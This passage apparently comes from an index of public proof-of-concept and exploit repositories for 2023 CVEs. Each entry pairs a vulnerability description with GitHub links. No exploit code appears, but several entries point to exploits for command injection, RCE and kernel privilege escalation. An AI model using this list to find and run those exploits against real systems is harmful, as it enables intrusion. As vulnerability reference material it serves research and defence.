[twwd/CVE-2023-0264](https://github.com/twwd/CVE-2023-0264) + +### CVE-2023-0266 (2023-01-30) + +A use after free vulnerability exists in the ALSA PCM package in the Linux Kernel. SNDRV_CTL_IOCTL_ELEM_{READ|WRITE}32 is missing locks that can be used in a use-after-free that can result in a priviledge escalation to gain ring0 access from the system user. We recommend upgrading past commit 56b88b50565cd8b946a2d00b0c83927b7ebb055e\n + + +- [SeanHeelan/claude_opus_cve_2023_0266](https://github.com/SeanHeelan/claude_opus_cve_2023_0266) + +### CVE-2023-0297 (2023-01-14) + +Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31. + + +- [bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad](https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad) +- [Small-ears/CVE-2023-0297](https://github.com/Small-ears/CVE-2023-0297) +- [JacobEbben/CVE-2023-0297](https://github.com/JacobEbben/CVE-2023-0297) +- [overgrowncarrot1/CVE-2023-0297](https://github.com/overgrowncarrot1/CVE-2023-0297) +- [btar1gan/exploit_CVE-2023-0297](https://github.com/btar1gan/exploit_CVE-2023-0297) +- [S4MY9/CVE-2023-0297](https://github.com/S4MY9/CVE-2023-0297) + +### CVE-2023-0315 (2023-01-16) + +Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8. + + +- [mhaskar/CVE-2023-0315](https://github.com/mhaskar/CVE-2023-0315) + +### CVE-2023-0386 (2023-03-22) + +A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system. + + +- [veritas501/CVE-2023-0386](https://github.com/veritas501/CVE-2023-0386) +- [Satheesh575555/linux-4.19.72_CVE-2023-0386](https://github.com/Satheesh575555/linux-4.19.72_CVE-2023-0386) +- [xkaneiki/CVE-2023-0386](https://github.com/xkaneiki/CVE-2023-0386) +- [chenaotian/CVE-2023-0386](https://github.com/chenaotian/CVE-2023-0386) +- [3yujw7njai/CVE-2023-0386](https://github.com/3yujw7njai/CVE-2023-0386) +- [hshivhare67/kernel_v4.19.72_CVE-2023-0386](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2023-0386) +- [sxlmnwb/CVE-2023-0386](https://github.com/sxlmnwb/CVE-2023-0386) +- [Fanxiaoyao66/CVE-2023-0386](https://github.com/Fanxiaoyao66/CVE-2023-0386) +- [puckiestyle/CVE-2023-0386](https://github.com/puckiestyle/CVE-2023-0386) +- [letsr00t/CVE-2023-0386](https://github.com/letsr00t/CVE-2023-0386) +- [churamanib/CVE-2023-0386](https://github.com/churamanib/CVE-2023-0386) +- [EstamelGG/CVE-2023-0386-libs](https://github.com/EstamelGG/CVE-2023-0386-libs) + +### CVE-2023-0400 (2023-02-01) + +\nThe protection bypass vulnerability in DLP for Windows 11.9.x is addressed in version 11.10.0. This allowed a local user to bypass DLP controls when uploading sensitive data from a mapped drive into a web email client. Loading from a local driver was correctly prevented. Versions prior to 11.9 correctly detected and blocked the attempted upload of sensitive data.\n\n + + +- [pinpinsec/CVE-2023-0400](https://github.com/pinpinsec/CVE-2023-0400) + +### CVE-2023-0461 (2023-02-28) + +There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege.\n\nThere is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock.\n\nWhen CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener. If a new socket is created from the listener, the context is inherited and vulnerable.\n\nThe setsockopt TCP_ULP operation does not require any privilege.\n\nWe recommend upgrading past commit 2c02d41d71f90a5168391b6a5f2954112ba2307c + + +- [hshivhare67/kernel_v4.19.72_CVE-2023-0461](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2023-0461) + +### CVE-2023-0464 (2023-03-22) + +A security vulnerability has been identified in all supported versions\n\nof OpenSSL related to the verification of X.509 certificate chains\nthat include policy constraints. Attackers may be able to exploit this\nvulnerability by creating a malicious certificate chain that triggers\nexponential use of computational resources, leading to a denial-of-service\n(DoS) attack on affected systems.\n\nPolicy processing is disabled by default but can be enabled by passing\nthe `-policy' argument to the command line utilities or by calling the\n`X509_VERIFY_PARAM_set1_policies()' function. + + +- [Trinadh465/Openssl_1.1.1g_CVE-2023-0464](https://github.com/Trinadh465/Openssl_1.1.1g_CVE-2023-0464) + +### CVE-2023-0630 (2023-03-20) + +The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query. + + +- [RandomRobbieBF/CVE-2023-0630](https://github.com/RandomRobbieBF/CVE-2023-0630) + +### CVE-2023-0656 (2023-03-02) + +A Stack-based buffer overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash. + + +- [BishopFox/CVE-2022-22274_CVE-2023-0656](https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656) + +### CVE-2023-0669 (2023-02-06) + +Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object. This issue was patched in version 7.1.2. + + +- [0xf4n9x/CVE-2023-0669](https://github.com/0xf4n9x/CVE-2023-0669) +- [cataliniovita/CVE-2023-0669](https://github.com/cataliniovita/CVE-2023-0669) +- [Griffin-01/CVE-2023-0669](https://github.com/Griffin-01/CVE-2023-0669) +- [yosef0x01/CVE-2023-0669-Analysis](https://github.com/yosef0x01/CVE-2023-0669-Analysis) +- [Avento/CVE-2023-0669](https://github.com/Avento/CVE-2023-0669) + +### CVE-2023-0748 (2023-02-08) + +Open Redirect in GitHub repository btcpayserver/btcpayserver prior to 1.7.6.\n\n + + +- [gonzxph/CVE-2023-0748](https://github.com/gonzxph/CVE-2023-0748) + +### CVE-2023-08 +- [amirzargham/CVE-2023-08-21-exploit](https://github.com/amirzargham/CVE-2023-08-21-exploit) + +### CVE-2023-0830 (2023-02-14) + +Es wurde eine kritische Schwachstelle in EasyNAS 1.1.0 entdeckt. Es betrifft die Funktion system der Datei /backup.pl. Durch Manipulation mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [xbz0n/CVE-2023-0830](https://github.com/xbz0n/CVE-2023-0830) + +### CVE-2023-0860 (2023-02-16) + +Improper Restriction of Excessive Authentication Attempts in GitHub repository modoboa/modoboa-installer prior to 2.0.4. + + +- [0xsu3ks/CVE-2023-0860](https://github.com/0xsu3ks/CVE-2023-0860) + +### CVE-2023-0861 (2023-02-16) + +NetModule NSRW web administration interface executes an OS command constructed with unsanitized user input. A successful exploit could allow an authenticated user to execute arbitrary commands with elevated privileges.\nThis issue affects NSRW: from 4.3.0.0 before 4.3.0.119, from 4.4.0.0 before 4.4.0.118, from 4.6.0.0 before 4.6.0.105, from 4.7.0.0 before 4.7.0.103.\n\n + + +- [seifallahhomrani1/CVE-2023-0861-POC](https://github.com/seifallahhomrani1/CVE-2023-0861-POC) + +### CVE-2023-422 +- [HusenjanDev/CVE-2023-422-Chamilo-LMS-RCE](https://github.com/HusenjanDev/CVE-2023-422-Chamilo-LMS-RCE) + +### CVE-2023-1112 (2023-03-01) + +Es wurde eine kritische Schwachstelle in Drag and Drop Multiple File Upload Contact Form 7 5.0.6.1 für WordPress ausgemacht. Es geht dabei um eine nicht klar definierte Funktion der Datei admin-ajax.php. Durch Manipulation des Arguments upload_name mit unbekannten Daten kann eine relative path traversal-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal](https://github.com/Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal) + +### CVE-2023-1177 (2023-03-24) + +Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.2.1.\n\n + + +- [hh-hunter/ml-CVE-2023-1177](https://github.com/hh-hunter/ml-CVE-2023-1177) +- [iumiro/CVE-2023-1177-MLFlow](https://github.com/iumiro/CVE-2023-1177-MLFlow) +- [SpycioKon/CVE-2023-1177-rebuild](https://github.com/SpycioKon/CVE-2023-1177-rebuild) +- [saimahmed/MLflow-Vuln](https://github.com/saimahmed/MLflow-Vuln) +- [charlesgargasson/CVE-2023-1177](https://github.com/charlesgargasson/CVE-2023-1177) + +### CVE-2023-1326 (2023-04-13) + +A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit. + + +- [diego-tella/CVE-2023-1326-PoC](https://github.com/diego-tella/CVE-2023-1326-PoC) +- [Pol-Ruiz/CVE-2023-1326](https://github.com/Pol-Ruiz/CVE-2023-1326) +- [n3rdh4x0r/CVE-2023-1326](https://github.com/n3rdh4x0r/CVE-2023-1326) +- [cve-2024/CVE-2023-1326-PoC](https://github.com/cve-2024/CVE-2023-1326-PoC) + +### CVE-2023-1337 (2023-03-10) + +The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the clear_uucss_logs function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete plugin log files. + + +- [Penkyzduyi/CVE-2023-1337](https://github.com/Penkyzduyi/CVE-2023-1337) + +### CVE-2023-1389 (2023-03-15) + +TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request. + + +- [Voyag3r-Security/CVE-2023-1389](https://github.com/Voyag3r-Security/CVE-2023-1389) +- [Terminal1337/CVE-2023-1389](https://github.com/Terminal1337/CVE-2023-1389) + +### CVE-2023-1415 (2023-03-15) + +In Simple Art Gallery 1.0 wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Das betrifft die Funktion sliderPicSubmit der Datei adminHome.php. Mit der Manipulation mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. + + +- [0xxtoby/CVE-2023-1415](https://github.com/0xxtoby/CVE-2023-1415) + +### CVE-2023-1430 (2023-06-09) + +The FluentCRM - Marketing Automation For WordPress plugin for WordPress is vulnerable to unauthorized modification of data in versions up to, and including, 2.7.40 due to the use of an MD5 hash without a salt to control subscriptions. This makes it possible for unauthenticated attackers to unsubscribe users from lists and manage subscriptions, granted they gain access to any targeted subscribers email address. + + +- [karlemilnikka/CVE-2023-1430](https://github.com/karlemilnikka/CVE-2023-1430) + +### CVE-2023-1454 (2023-03-17) + +Es wurde eine Schwachstelle in jeecg-boot 3.5.0 entdeckt. Sie wurde als kritisch eingestuft. Betroffen hiervon ist ein unbekannter Ablauf der Datei jmreport/qurestSql. Durch Beeinflussen des Arguments apiSelectId mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [gobysec/CVE-2023-1454](https://github.com/gobysec/CVE-2023-1454) +- [cjybao/CVE-2023-1454](https://github.com/cjybao/CVE-2023-1454) +- [3yujw7njai/CVE-2023-1454-EXP](https://github.com/3yujw7njai/CVE-2023-1454-EXP) +- [BugFor-Pings/CVE-2023-1454](https://github.com/BugFor-Pings/CVE-2023-1454) +- [padbergpete47/CVE-2023-1454](https://github.com/padbergpete47/CVE-2023-1454) +- [Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln](https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln) +- [shad0w0sec/CVE-2023-1454-EXP](https://github.com/shad0w0sec/CVE-2023-1454-EXP) + +### CVE-2023-1488 (2023-03-18) + +Es wurde eine Schwachstelle in Lespeed WiseCleaner Wise System Monitor 1.5.3.54 gefunden. Sie wurde als problematisch eingestuft. Betroffen hiervon ist die Funktion 0x9C40A0D8/0x9C40A0DC/0x9C40A0E0 in der Bibliothek WiseHDInfo64.dll der Komponente IoControlCode Handler. Durch Manipulieren mit unbekannten Daten kann eine denial of service-Schwachstelle ausgenutzt werden. Der Angriff hat dabei lokal zu erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [involuntairly/CVE-2023-1488](https://github.com/involuntairly/CVE-2023-1488) + +### CVE-2023-1498 (2023-03-19) + +Es wurde eine kritische Schwachstelle in code-projects Responsive Hotel Site 1.0 entdeckt. Dabei betrifft es einen unbekannter Codeteil der Datei messages.php der Komponente Newsletter Log Handler. Durch Beeinflussen des Arguments title mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [Decemberus/BugHub](https://github.com/Decemberus/BugHub) + +### CVE-2023-1665 (2023-03-27) + +Improper Restriction of Excessive Authentication Attempts in GitHub repository linagora/twake prior to 0.0.0. + + +- [0xsu3ks/CVE-2023-1665](https://github.com/0xsu3ks/CVE-2023-1665) + +### CVE-2023-1671 (2023-04-04) + +A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code. + + +- [ohnonoyesyes/CVE-2023-1671](https://github.com/ohnonoyesyes/CVE-2023-1671) +- [W01fh4cker/CVE-2023-1671-POC](https://github.com/W01fh4cker/CVE-2023-1671-POC) +- [csffs/cve-2023-1671](https://github.com/csffs/cve-2023-1671) + +### CVE-2023-1698 (2023-05-15) + +In multiple products of WAGO a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behaviour, Denial of Service and full system compromise. + + +- [Chocapikk/CVE-2023-1698](https://github.com/Chocapikk/CVE-2023-1698) +- [deIndra/CVE-2023-1698](https://github.com/deIndra/CVE-2023-1698) +- [thedarknessdied/WAGO-CVE-2023-1698](https://github.com/thedarknessdied/WAGO-CVE-2023-1698) + +### CVE-2023-1718 (2023-11-01) + +\nImproper file stream access in /desktop_app/file.ajax.php?action=uploadfile in Bitrix24 22.0.300 allows unauthenticated remote attackers to cause denial-of-service via a crafted "tmp_url".\n\n\n\n\n\n + + +- [jhonnybonny/Bitrix24DoS](https://github.com/jhonnybonny/Bitrix24DoS) + +### CVE-2023-1767 (2023-04-20) + +The Snyk Advisor website (https://snyk.io/advisor/) was vulnerable to a stored XSS prior to 28th March 2023. A feature of Snyk Advisor is to display the contents of a scanned package's Readme on its package health page. An attacker could create a package in NPM with an associated markdown README file containing XSS-able HTML tags. Upon Snyk Advisor importing the package, the XSS would run each time an end user browsed to the package's page on Snyk Advisor. + + +- [weizman/CVE-2023-1767](https://github.com/weizman/CVE-2023-1767) + +### CVE-2023-1773 (2023-03-31) + +In Rockoa 2.3.2 wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Datei webmainConfig.php der Komponente Configuration File Handler. Durch Beeinflussen mit unbekannten Daten kann eine code injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [CTF-Archives/xinhu-v2.3.2](https://github.com/CTF-Archives/xinhu-v2.3.2) + +### CVE-2023-1829 (2023-04-12) + +A use-after-free vulnerability in the Linux Kernel traffic control index filter (tcindex) can be exploited to achieve local privilege escalation. The tcindex_delete function which does not properly deactivate filters in case of a perfect hashes while deleting the underlying structure which can later lead to double freeing the structure. A local attacker user can use this vulnerability to elevate its privileges to root.\nWe recommend upgrading past commit 8c710f75256bb3cf05ac7b1672c82b92c43f3d28.\n\n + + +- [lanleft/CVE-2023-1829](https://github.com/lanleft/CVE-2023-1829) + +### CVE-2023-1874 (2023-04-12) + +The WP Data Access plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.3.7. This is due to a lack of authorization checks on the multiple_roles_update function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wpda_role[]' parameter during a profile update. This requires the 'Enable role management' setting to be enabled for the site. + + +- [thomas-osgood/cve-2023-1874](https://github.com/thomas-osgood/cve-2023-1874) + +### CVE-2023-1999 (2023-06-20) + +There exists a use after free/double free in libwebp. An attacker can use the ApplyFiltersAndEncode() function and loop through to free best.bw and assign best = trial pointer. The second loop will then return 0 because of an Out of memory error in VP8 encoder, the pointer is still assigned to trial and the AddressSanitizer will attempt a double free. \n + + +- [Pazhanivelmani/webp_Android10_r33_CVE-2023-1999](https://github.com/Pazhanivelmani/webp_Android10_r33_CVE-2023-1999) + +### CVE-2023-2002 (2023-05-26) + +A vulnerability was found in the HCI sockets implementation due to a missing capability check in net/bluetooth/hci_sock.c in the Linux Kernel. This flaw allows an attacker to unauthorized execution of management commands, compromising the confidentiality, integrity, and availability of Bluetooth communication. + + +- [lrh2000/CVE-2023-2002](https://github.com/lrh2000/CVE-2023-2002) + +### CVE-2023-2008 (2023-04-14) + +A flaw was found in the Linux kernel's udmabuf device driver. The specific flaw exists within a fault handler. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an array. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel. + + +- [bluefrostsecurity/CVE-2023-2008](https://github.com/bluefrostsecurity/CVE-2023-2008) + +### CVE-2023-2023 (2023-05-30) + +The Custom 404 Pro WordPress plugin before 3.7.3 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting. + + +- [thatformat/Hvv2023](https://github.com/thatformat/Hvv2023) +- [druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation](https://github.com/druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation) + +### CVE-2023-2024 (2023-05-18) + +Improper authentication in OpenBlue Enterprise Manager Data Collector versions prior to 3.2.5.75 allow access to an unauthorized user under certain circumstances. + + +- [team890/CVE-2023-2024](https://github.com/team890/CVE-2023-2024) + +### CVE-2023-2033 (2023-04-14) + +Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [insoxin/CVE-2023-2033](https://github.com/insoxin/CVE-2023-2033) +- [sandumjacob/CVE-2023-2033-Analysis](https://github.com/sandumjacob/CVE-2023-2033-Analysis) +- [gretchenfrage/CVE-2023-2033-analysis](https://github.com/gretchenfrage/CVE-2023-2033-analysis) +- [mistymntncop/CVE-2023-2033](https://github.com/mistymntncop/CVE-2023-2033) +- [tianstcht/CVE-2023-2033](https://github.com/tianstcht/CVE-2023-2033) + +### CVE-2023-2114 (2023-05-08) + +The NEX-Forms WordPress plugin before 8.4 does not properly escape the `table` parameter, which is populated with user input, before concatenating it to an SQL query. + + +- [SchmidAlex/nex-forms_SQL-Injection-CVE-2023-2114](https://github.com/SchmidAlex/nex-forms_SQL-Injection-CVE-2023-2114) + +### CVE-2023-2123 (2023-08-16) + +The WP Inventory Manager WordPress plugin before 2.1.0.13 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. + + +- [0xn4d/poc-cve-xss-encoded-wp-inventory-manager-plugin](https://github.com/0xn4d/poc-cve-xss-encoded-wp-inventory-manager-plugin) + +### CVE-2023-2163 (2023-09-20) + +Incorrect verifier pruning in BPF in Linux Kernel >=5.4 leads to unsafe\ncode paths being incorrectly marked as safe, resulting in arbitrary read/write in\nkernel memory, lateral privilege escalation, and container escape. + + +- [letsr00t/CVE-2023-2163](https://github.com/letsr00t/CVE-2023-2163) + +### CVE-2023-2215 (2023-04-21) + +Es wurde eine kritische Schwachstelle in Campcodes Coffee Shop POS System 1.0 entdeckt. Es betrifft eine unbekannte Funktion der Datei /admin/user/manage_user.php. Mittels Manipulieren des Arguments id mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [zwxxb/CVE-2023-2215](https://github.com/zwxxb/CVE-2023-2215) + +### CVE-2023-2249 (2023-06-09) + +The wpForo Forum plugin for WordPress is vulnerable to Local File Include, Server-Side Request Forgery, and PHAR Deserialization in versions up to, and including, 2.1.7. This is due to the insecure use of file_get_contents without appropriate verification of the data being supplied to the function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to retrieve the contents of files like wp-config.php hosted on the system, perform a deserialization attack and possibly achieve remote code execution, and make requests to internal services. + + +- [ixiacom/CVE-2023-2249](https://github.com/ixiacom/CVE-2023-2249) + +### CVE-2023-2255 (2023-05-25) + +Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3. + + +- [elweth-sec/CVE-2023-2255](https://github.com/elweth-sec/CVE-2023-2255) +- [SaintMichae64/CVE-2023-2255](https://github.com/SaintMichae64/CVE-2023-2255) + +### CVE-2023-2375 (2023-04-28) + +Eine kritische Schwachstelle wurde in Ubiquiti EdgeRouter X bis 2.0.9-hotfix.6 gefunden. Es geht hierbei um eine nicht näher spezifizierte Funktion der Komponente Web Management Interface. Mittels Manipulieren des Arguments src mit unbekannten Daten kann eine command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [0x0jr/HTB-Devvortex-CVE-2023-2375-PoC](https://github.com/0x0jr/HTB-Devvortex-CVE-2023-2375-PoC) + +### CVE-2023-2437 (2023-11-22) + +The UserPro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.1.1. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. An attacker can leverage CVE-2023-2448 and CVE-2023-2446 to get the user's email address to successfully exploit this vulnerability. + + +- [RxRCoder/CVE-2023-2437](https://github.com/RxRCoder/CVE-2023-2437) + +### CVE-2023-2516 (2023-05-05) + +Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.7. + + +- [mnqazi/CVE-2023-2516](https://github.com/mnqazi/CVE-2023-2516) + +### CVE-2023-2523 (2023-05-04) + +Eine kritische Schwachstelle wurde in Weaver E-Office 9.5 ausgemacht. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei App/Ajax/ajax.php?action=mobile_upload_save. Mittels Manipulieren des Arguments upload_quwan mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [bingtangbanli/cve-2023-2523-and-cve-2023-2648](https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648) +- [Any3ite/CVE-2023-2523](https://github.com/Any3ite/CVE-2023-2523) + +### CVE-2023-2579 (2023-07-17) + +The InventoryPress WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow users with the role of author and above to perform Stored Cross-Site Scripting attacks. + + +- [0xn4d/poc-cve-xss-inventory-press-plugin](https://github.com/0xn4d/poc-cve-xss-inventory-press-plugin) + +### CVE-2023-2591 (2023-05-09) + +Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitHub repository nilsteampassnet/teampass prior to 3.0.7. + + +- [mnqazi/CVE-2023-2591](https://github.com/mnqazi/CVE-2023-2591) + +### CVE-2023-2594 (2023-05-09) + +Es wurde eine Schwachstelle in SourceCodester Food Ordering Management System 1.0 gefunden. Sie wurde als kritisch eingestuft. Hiervon betroffen ist ein unbekannter Codeblock der Komponente Registration. Durch die Manipulation des Arguments username mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. + + +- [thehackingverse/CVE-2023-2594](https://github.com/thehackingverse/CVE-2023-2594) + +### CVE-2023-2598 (2023-06-01) + +A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer. This flaw enables full local privilege escalation. + + +- [ysanatomic/io_uring_LPE-CVE-2023-2598](https://github.com/ysanatomic/io_uring_LPE-CVE-2023-2598) +- [cainiao159357/CVE-2023-2598](https://github.com/cainiao159357/CVE-2023-2598) +- [LLfam/CVE-2023-2598](https://github.com/LLfam/CVE-2023-2598) + +### CVE-2023-2603 (2023-06-06) + +A vulnerability was found in libcap. This issue occurs in the _libcap_strdup() function and can lead to an integer overflow if the input string is close to 4GiB. + + +- [Pazhanivelmani/external_libcap-Android10_r33_CVE-2023-2603](https://github.com/Pazhanivelmani/external_libcap-Android10_r33_CVE-2023-2603) + +### CVE-2023-2636 (2023-07-17) + +The AN_GradeBook WordPress plugin through 5.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber + + +- [lukinneberg/CVE-2023-2636](https://github.com/lukinneberg/CVE-2023-2636) + +### CVE-2023-2640 (2023-07-26) + +On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks. + + +- [OllaPapito/gameoverlay](https://github.com/OllaPapito/gameoverlay) +- [luanoliveira350/GameOverlayFS](https://github.com/luanoliveira350/GameOverlayFS) +- [g1vi/CVE-2023-2640-CVE-2023-32629](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629) +- [musorblyat/CVE-2023-2640-CVE-2023-32629](https://github.com/musorblyat/CVE-2023-2640-CVE-2023-32629) +- [SanjayRagavendar/Ubuntu-GameOver-Lay](https://github.com/SanjayRagavendar/Ubuntu-GameOver-Lay) +- [Nkipohcs/CVE-2023-2640-CVE-2023-32629](https://github.com/Nkipohcs/CVE-2023-2640-CVE-2023-32629) +- [K5LK/CVE-2023-2640-32629](https://github.com/K5LK/CVE-2023-2640-32629) + +### CVE-2023-2645 (2023-05-11) + +Es wurde eine Schwachstelle in USR USR-G806 1.0.41 gefunden. Sie wurde als kritisch eingestuft. Betroffen hiervon ist ein unbekannter Ablauf der Komponente Web Management Page. Durch das Manipulieren des Arguments username/password mit der Eingabe root mit unbekannten Daten kann eine use of hard-coded password-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. Als bestmögliche Massnahme werden Anpassungen an der Konfiguration empfohlen. + + +- [xymbiot-solution/CVE-2023-2645](https://github.com/xymbiot-solution/CVE-2023-2645) + +### CVE-2023-2650 (2023-05-30) + +Issue summary: Processing some specially crafted ASN.1 object identifiers or\ndata containing them may be very slow.\n\nImpact summary: Applications that use OBJ_obj2txt() directly, or use any of\nthe OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message\nsize limit may experience notable to very long delays when processing those\nmessages, which may lead to a Denial of Service.\n\nAn OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers -\nmost of which have no size limit. OBJ_obj2txt() may be used to translate\nan ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL\ntype ASN1_OBJECT) to its canonical numeric text form, which are the\nsub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by\nperiods.\n\nWhen one of the sub-identifiers in the OBJECT IDENTIFIER is very large\n(these are sizes that are seen as absurdly large, taking up tens or hundreds\nof KiBs), the translation to a decimal number in text may take a very long\ntime. The time complexity is O(n^2) with 'n' being the size of the\nsub-identifiers in bytes (*).\n\nWith OpenSSL 3.0, support to fetch cryptographic algorithms using names /\nidentifiers in string form was introduced. This includes using OBJECT\nIDENTIFIERs in canonical numeric text form as identifiers for fetching\nalgorithms.\n\nSuch OBJECT IDENTIFIERs may be received through the ASN.1 structure\nAlgorithmIdentifier, which is commonly used in multiple protocols to specify\nwhat cryptographic algorithm should be used to sign or verify, encrypt or\ndecrypt, or digest passed data.\n\nApplications that call OBJ_obj2txt() directly with untrusted data are\naffected, with any version of OpenSSL. If the use is for the mere purpose\nof display, the severity is considered low.\n\nIn OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME,\nCMS, CMP/CRMF or TS. It also impacts anything that processes X.509\ncertificates, including simple things like verifying its signature.\n\nThe impact on TLS is relatively low, because all versions of OpenSSL have a\n100KiB limit on the peer's certificate chain. Additionally, this only\nimpacts clients, or servers that have explicitly enabled client\nauthentication.\n\nIn OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects,\nsuch as X.509 certificates. This is assumed to not happen in such a way\nthat it would cause a Denial of Service, so these versions are considered\nnot affected by this issue in such a way that it would be cause for concern,\nand the severity is therefore considered low. + + +- [hshivhare67/OpenSSL_1.1.1g_CVE-2023-2650](https://github.com/hshivhare67/OpenSSL_1.1.1g_CVE-2023-2650) + +### CVE-2023-2728 (2023-07-03) + +Users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures pods running with a service account may only reference 